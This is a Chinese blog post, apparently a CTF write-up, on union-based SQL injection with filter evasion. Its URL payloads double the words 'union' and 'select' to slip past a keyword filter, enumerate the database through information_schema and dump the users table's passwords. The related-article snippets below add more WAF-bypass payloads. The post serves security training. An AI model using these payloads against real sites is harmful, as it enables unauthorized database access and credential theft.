SQL注入-union注入

已于 2022-11-08 15:36:46 修改
阅读量831 收藏
点赞数
分类专栏: SQL注入 union注入 文章标签: web安全
于 2022-11-08 13:38:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_24899063/article/details/127749002
版权

题目:lrhttp://url/?q=123123

过滤了union和select,考虑用双写绕过。

判断注入点:

判断列数order by:

/?q=1'%20order%20by%204%20%23

 

明确了列数为3列。

判断回显位:

/?q=1'%20uniounionn%20selecselectt%201,2,3%20%23

 开始判断库名:

/?q=1'%20uniounionn%20selecselectt%20database(),2,3%20%23

得到level3库。

判断表名:

/?q=1'%20uniounionn%20selecselectt%20(selecselectt%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),2,3%20%23

得到users表。

 判断列名:
/?q=1'%20uniounionn%20selecselectt%20(selecselectt%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name='users'),2,3%20%23

 查询字段:

/?q=1'%20uniounionn%20selecselectt%20(selecselectt%20group_concat(password)%20from%20users),2,3%20%23

得到flag{45fe4da0bbdecf06c10b5b070c1fb9fd}

也可以:

/?q=1'uniunionon%20seleselectct%201,username,password%20from%20users%20%23

qq_24899063
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2021-09-01 网安实验-SQL注入-绕过UNION&SELECT过滤
时光隧道
09-01 4万+
关键代码为: 在MySQL中tab,空格,回车都可以隔断语句,那么我们就可以用使用/**/ 或() 或+ 代替空格,%0c =换页、%09 = 水平制表符、%0d = 回车、%0a = 换行。那我们试试 『id=12211%27+uniOn%09selEct%0d1,2,password%0dfrom%0dusers%0dwhere%0did=%272%27||%27』 成功了呢。很多不可见的空白字符都可以用哦,你可以试试。 ...
SQL注入-联合查询注入union
qq_57307348的博客
01-23 3465
目录 SQL注入的一库三表 union联合查询注入注意事项 MySQL函数利用 1、常用函数 2、连接字符串函数 联合查询注入union 利用前提 联合注入的过程 1、先判断有没有注入点 3、判断有多少列 4、判断显示位 5、显示有哪些数据库 6、显示数据库中有哪些表 7、显示表中有哪些字段(以users为例) 8、获取字段 SQL注入的一库三表 information_schema 元数据数据库 (数据库名, 表名, 字段...
sql注入-union注入union函数 联合注入
07-11 7365
union注入】可与报错注入、盲注、堆叠注入等方法结合使用
SQL注入union 联合注入
weixin_53711701的博客
01-16 4365
SQL注入union联合注入
SQL注入遇到过滤,二次注入
qq_61412565的博客
08-13 1047
SQL注入总不能一帆风顺,对面有时候会有一些防御,过安全狗宝塔那些先且不谈,就是过滤注释符号的时候。(新注意到一个知识点,get传参有urf编码,而post没有)应对方法有:因为注释符不起效,所以灵活用or,构造 or '1' ='1,来把后面的’给过滤掉,(但这是知道靶场源码做出来的方式,实战怎么搞呢)。上面一步是默认把字符型数字型测出来了,那么要记得该测列数和回显位了(这里居然忘了该有这步,真是不器用),以前常规的做法是 and order by 1234,这样不停换数字看他报错的嘛。
SQL注入绕过关键词过滤的小技巧及原理(union select为例)
热门推荐
weixin_54848371的博客
09-22 1万+
本文以联合查询关键字union select为例讲解绕过关键词过滤的一些方法。之所以了解绕过,关键是发现sqlmap有时候真的是不靠谱,只能指定命令跑。有一些简单过滤很容易绕过却不能检测。虽然麻烦点,手工yyds~~。 1、大小写变种 UNION SELECT=>uNIon SElecT 选择几个字母变换大小写,可以绕过部分不太聪明的过滤器。在sql查询中是不区分大小写的所以查询语句正常执行 2、使用SQL注释 union select=>/**/UNION/**/...
SQL注入系列篇之union联合注入
d59hao的博客
04-27 707
union注入攻击,通过unionunion all连接,将自己写的SQL拼接到原始SQL中,从而达到执行任意SQL语句的效果。
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
10-sql注入-mysql注入1
08-03
SQL注入是一种常见的安全漏洞,通常发生在Web应用程序中,允许攻击者通过输入恶意SQL代码来操纵数据库。MySQL注入是其中一种,特别针对使用MySQL数据库的应用。本文将深入探讨MySQL注入的原理、常见攻击手段以及防范...
详解SQL注入--安全(二)
09-09
SQL注入是一种常见的网络安全威胁,它发生在应用程序未能正确过滤或转义用户输入的SQL语句时。当攻击者向Web表单或URL参数中输入特定的SQL命令片段时,他们可以篡改数据库查询,获取敏感信息,甚至控制整个数据库...
SQL注入天书 sqli-labs
01-11
SQL注入天书 sqli-labs》是一本深入探讨SQL注入技术的专业资料,结合了sqli-labs实战平台,旨在帮助读者强化对SQL注入的理解和防御能力。SQL注入是一种常见的网络安全漏洞,攻击者通过在输入数据中嵌入恶意SQL代码...
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型盲注、错误显示注入Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
绕过去除union和select的SQL注入
qq_43776408的博客
06-14 1539
去除union代码分析 我就问你看的气不气 全过滤了 绕过去除unionSQL注入 浏览器输入id1’报错 说明存在sql注入漏洞的 猜测原语句为id=‘id’ 在输入id=1’ --+ 依然报错 输入特别大的id故意使其报错 Sqlmap安全测试 ...
关于sql注入过滤union select和--+和空格
weixin_43326436的博客
06-07 923
一.一些可以替代的 1.空格可以用%0a替代 2.–+可以转换成’1’='1 3.union select 可以用uniOn selEct这种转换中夹杂着大小写 二.实战 真复杂。。。。。。。。。。 1.爆库 0’%0auNion%0aselEct%0a1,(database()),3%0aand%0a’1’=‘1 爆出的库名为security 2.爆表 0’%0auNion%0aselEct%0a1,(selEct%0agroup_concat(table_name)%0afrom%0ainformati
9-Web安全——SQL注入WAF绕过之select及union过滤
网络安全
06-03 1万+
1. select及union过滤绕过 真实的注入环境中一般无法通过网站的源代码进行安全审计的,那么在注入过程中我们就需要使用常见的SQL注入绕过技巧来帮助我们进行绕过WAF。 首先需要判断网页的注入类型,输入参数?id=1%0Aand%0A1=2,测试URL为: http://www.sqli.com/Less-27/?id=1%0Aand%0A1=2 页面返回的结果如下: 当我们输入id=1 and 1=2时,页面还是正常返回,说明这是一个字符型注入。 然...
SQL注入绕过
imredboy的博客
03-31 1241
0x01 前言 我们经常利用一些数据库特性来进行WAF绕过。在Mysql中,比如可以这样: 内联注释: /!12345union/select Mysql黑魔法: select{x user}from{x mysql.user}; 换行符绕过:%23%0a、%2d%2d%0a 一起去探索一下能够绕过WAF防护的数据库特性。 0x02 测试 常见有5个位置即: SELECT * FROM admin WHERE username = 1【位置一】union【位置二】select【位置三】1,user()【
sql注入中过滤关键字(union select等等)
没事我溜达
03-15 8519
今天来学习一下注入中关键字被过滤了该如何解决 打开靶场,这是我本地搭建的一个靶场所以没有靶场地址 我们在输入框内输入一个1 查询一下结果。 尝试闭合和注释,发现单引号即可完成闭合,--+作为注释内容,通过order by查询列数 看到页面上方order的or被过滤,说明or即是关键词,我们双写or,变成 oorrder by 2 (一定要在or的中间双写or,不然两个都会被注释掉) 通过order by发现只有两列数据,那么开始联合注入 ...
sql注入利用union来绕过括号过滤
plant1234的博客
04-02 7759
union盲注 当我们在括号被过滤的时候,就不能使用sub(),mid()等多种函数 于是相等union 要想知道uinon的怎么进行盲注,就要了解union 这个给大家看几个mysql的查询语句: 通过这三条语句我们可以看到,我们我利用union将一条数据:1,2,0x69 与查询出来的数据进行降序排序,在排序过程中可以看出用的是ascii码 进行的排序。当我们给的password的ascii值大于admin用户密码的ascii值时,则第一条数据就是我们给的数据。所有就可以判断password的值为
【网络安全科普】勒索病毒 防护指南
最新发布
a38417的博客
07-20 653
常规的杀毒软件查找病毒的原理一般是对当前计算机上的文件进行特征的检测,检测完成后和现有的病毒库中的特征数据进行匹配,如果可以匹配成功则找到病毒文件,因此现有的勒索病毒对我们常用的常规杀毒软件是一个很大的挑战。一旦勒索病毒感染了计算机,它会立即开始加密用户的文件,包括文档、图片、视频等,并在屏幕上显示要求用户支付赎金的消息。从操作系统来看被植入病毒的主要是Windows XP、Windows 7,原因是目前这些系统中有一部分微软官方已经不再支持更新、以及补丁的维护,一般会存在较多的无法及时修复的漏洞。
SQL注入实战:sqli-labs实验详解
"sqli-labs实验指导手册详细介绍了如何通过搭建sqli-labs实验平台来学习和实践SQL注入攻击及防御。本实验手册主要针对基于单引号的字符型联合注入进行深入解析,帮助读者理解SQL注入的原理,并提供逐步解密数据库...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值